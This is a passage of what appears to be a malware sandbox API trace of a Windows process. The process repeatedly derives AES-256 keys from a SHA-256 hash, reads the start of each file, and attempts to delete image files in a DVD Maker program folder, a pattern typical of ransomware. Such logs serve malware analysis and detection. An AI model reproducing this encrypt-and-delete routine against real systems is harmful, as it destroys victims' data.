maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp")) returned 0 [0142.226] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.226] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.226] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.226] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.226] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf26 [0142.226] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.228] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.228] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.228] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.230] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png")) returned 0 [0142.267] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.268] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.268] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.268] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.268] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc8f [0142.268] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.270] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.270] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.270] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.271] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png")) returned 0 [0142.271] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.272] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.272] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.272] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.272] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13c3 [0142.272] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.275] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.275] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.275] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.276] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png")) returned 0 [0142.277] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.277] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.277] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.277] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.277] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0142.277] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.280] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.280] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.280] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.281] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp")) returned 0 [0142.297] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0142.297] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.297] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.297] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.297] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5c9f [0142.297] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.301] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.301] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.301] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.303] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png")) returned 0 [0142.314] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0142.315] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.316] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.316] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.316] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.316] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0142.316] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.318] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.319] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.319] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.319] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png")) returned 0 [0142.320] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.321] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.321] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.321] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.321] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb04 [0142.321] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.324] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.324] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.324] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.325] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png")) returned 0 [0142.326] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.326] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.326] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.326] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.326] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0142.326] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.354] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.354] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.354] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.355] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png")) returned 0 [0142.356] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.356] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.356] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.357] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.357] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0142.357] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.363] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.363] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.363] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.364] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png")) returned 0 [0142.365] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.365] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.366] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.366] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.366] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0142.366] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.369] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.369] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.369] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.370] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png")) returned 0 [0142.371] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.371] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.371] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.371] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.371] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0142.371] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.373] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.373] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.373] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.375] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png")) returned 0 [0142.375] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.376] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.376] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.376] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.376] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0142.376] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.379] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.379] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.379] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.380] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png")) returned 0 [0142.381] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.382] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.382] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.382] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.382] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0142.382] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.391] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.391] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.391] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.393] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png")) returned 0 [0142.393] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.394] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.394] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.394] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.394] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5fc8 [0142.394] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.398] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.398] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.398] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.399] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png")) returned 0 [0142.400] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0142.401] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.402] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.402] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.402] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.402] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0142.402] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.404] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.404] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.404] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.405] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png")) returned 0 [0142.406] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.406] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.407] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.407] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.407] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb05 [0142.407] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.409] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.409] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.409] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.410] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png")) returned 0 [0142.411] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.412] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.412] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.412] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.412] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11d3 [0142.412] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.415] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.415] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.415] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.416] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png")) returned 0 [0142.417] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.417] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.417] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.417] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.417] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x123d [0142.417] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.420] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.420] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.420] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.421] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png")) returned 0 [0142.422] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.423] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.423] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.423] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.423] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6794 [0142.423] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, 